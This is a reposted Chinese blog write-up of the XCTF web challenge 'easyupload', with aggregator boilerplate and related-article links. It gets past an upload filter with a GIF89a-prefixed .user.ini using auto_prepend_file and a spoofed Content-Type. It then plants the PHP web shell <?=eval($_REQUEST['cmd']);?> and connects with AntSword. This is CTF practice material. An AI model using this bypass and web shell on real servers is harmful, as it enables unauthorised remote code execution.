1. Toy模板网首页
  2. > Toy博客

攻防世界-WEB-easyupload

9月前 作者:Lucifer_wei 分类:Toy博客 阅读(35) 违法举报

这篇具有很好参考价值的文章主要介绍了攻防世界-WEB-easyupload。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

1.新建.user.ini文件,内容如下
GIF89a
auto_prepend_file=a.jpg
2.上传该文件,并用burp抓包,将Content-Type: application/octet-stream修改为
Content-Type: image/jpg

攻防世界-WEB-easyupload,CTF练习册,改行学it
3.放包,结果如下攻防世界-WEB-easyupload,CTF练习册,改行学it


4. 新建a.txt文件,内容为
GIF89a

<?=eval($_REQUEST['cmd']);?>

保存后将文件后缀修改为.jpg
5.直接上传该文件即可成功上传

攻防世界-WEB-easyupload,CTF练习册,改行学it
PS:按F12打开调试器选择网络查看上传文件的地址攻防世界-WEB-easyupload,CTF练习册,改行学it


如图所示上传地址为:****/uploads/index.php
6.直接蚁剑连接攻防世界-WEB-easyupload,CTF练习册,改行学it


7.结果如下攻防世界-WEB-easyupload,CTF练习册,改行学it


8.查找flag攻防世界-WEB-easyupload,CTF练习册,改行学it文章来源地址https://www.toymoban.com/news/detail-707791.html

到了这里,关于攻防世界-WEB-easyupload的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

分享到:
领支付宝红包 赞助服务器费用

相关文章

  • CTF wed安全(攻防世界)练习题

    CTF wed安全(攻防世界)练习题

    进入网站如图: 翻译:在这个小小的挑战训练中,你将学习Robots exclusion standard。网络爬虫使用robots.txt文件来检查它们是否被允许抓取和索引您的网站或只是其中的一部分。 有时这些文件会暴露目录结构,而不是保护内容不被抓取。 好好享受吧!   步骤一: 进入robots.txt文

    2024年04月17日
    浏览(42)
  • CTF-攻防世界web新手入门篇

    CTF-攻防世界web新手入门篇

    攻防世界网址 https://adworld.xctf.org.cn 新手篇虽然非常简单,但是对于小白来说这种最常见的常识或者思路可能不熟悉,所以在这里给大家分享一下最不起眼的小常识或者小技巧。 1、view_source 访问题目场景,如下图 鼠标右击不能用,但是F12也可以看源码,发现有个脚本是实现

    2024年02月06日
    浏览(43)
  • 攻防世界ctf web easyphp题解wp

    攻防世界ctf web easyphp题解wp

    第一步,用科学计数法绕过 a=1e9 第二步,用php代码编写MD5碰撞脚本得到b=53724 第三步,绕过is_numeric函数 第四步,绕过is_array函数  第五步,绕过array_search函数 一定要对传值url编码 提交得到flag  

    2024年02月16日
    浏览(42)
  • 【web | CTF】攻防世界 wife_wife

    【web | CTF】攻防世界 wife_wife

    目录 步骤1:峰回路转 步骤2:JavaScript原型链污染 步骤3:fuzz测试 总结:题目意义 对英语无感的我一开始没看到有个注册的提示,还以为暴力破解,看了一下题目才知道不需要暴力破解 来到注册页面 ,就发现有点吊了,is admin可以勾选,居然能注册管理员,有点搞笑,不切

    2024年02月07日
    浏览(38)
  • 攻防世界WEB练习区(backup、cookie、disabled_button)

    攻防世界WEB练习区(backup、cookie、disabled_button)

    前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog 攻防世界专栏:https://blog.csdn.net/m0_63127854/category_11983747.html 网络安全交流社区:https://bbs.csdn.net/forums/angluoanquan 目录 backup 题目介绍 题目思路 访问靶场 常见备份文件后缀名 访问ind

    2024年01月19日
    浏览(30)
  • [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    [CTF/网络安全] 攻防世界 Web_php_include 解题详析(php伪协议、data伪协议、file伪协议)

    这段代码首先通过 show_source(__FILE__) 显示当前文件的源代码,然后通过 $_GET[\\\'hello\\\'] 显示 URL 参数中名为 hello 的值。 接下来,代码使用 $_GET[\\\'page\\\'] 获取 URL 参数中名为 “page” 的值,并进行字符串替换,将 php:// 替换为空字符串 这是为了防止通过 URL 参数加载本地文件或其他可

    2024年02月08日
    浏览(46)
  • [CTF/网络安全] 攻防世界 cookie 解题详析

    [CTF/网络安全] 攻防世界 cookie 解题详析

    题目描述:X老师告诉小宁他在cookie里放了些东西,小宁疑惑地想:这是夹心饼干的意思吗? 根据提示,获取页面Cookie中的数据即可 页面提示 look here:cookie.php ,于是GET /cookie.php : 提示 查看HTTP响应 method 1 HTTP响应通常可以在浏览器的开发者工具中找到。 按下F12键打开浏览器

    2024年02月05日
    浏览(42)
  • [CTF/网络安全] 攻防世界 backup 解题详析

    [CTF/网络安全] 攻防世界 backup 解题详析

    题目描述:X老师忘记删除备份文件,他派小宁同学去把备份文件找出来,一起来帮小宁同学吧! PHP 脚本文件的备份文件名,通常采用以下命名方式: 在原始文件名后添加日期时间戳。例如,如果要备份名为 index.php 的文件,则可以将其备份文件命名为 index_20230521_004017.php。这

    2024年02月05日
    浏览(64)
  • [CTF/网络安全] 攻防世界 PHP2 解题详析

    [CTF/网络安全] 攻防世界 PHP2 解题详析

    翻译: 你能给这个网站进行身份验证吗? index.php是一个常见的文件名,通常用于Web服务器中的网站根目录下。它是默认的主页文件名,在访问一个网站时,如果没有特别指定页面文件名,则服务器会自动加载index.php文件。 在Web应用程序中,index.php文件通常是网站的入口文件

    2024年02月13日
    浏览(45)
  • [CTF/网络安全] 攻防世界 php_rce 解题详析

    [CTF/网络安全] 攻防世界 php_rce 解题详析

    PHP RCE 指的是通过远程代码执行漏洞(Remote Code Execution)来攻击 PHP 程序的一种方式。简单来说,由于PHP应用程序没有正确处理外部输入数据(如用户提交的表单、请求参数等),攻击者通过某些手段向 PHP 应用程序中注入恶意代码,然后通过这些恶意代码实现对受攻击服务器

    2024年02月06日
    浏览(50)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包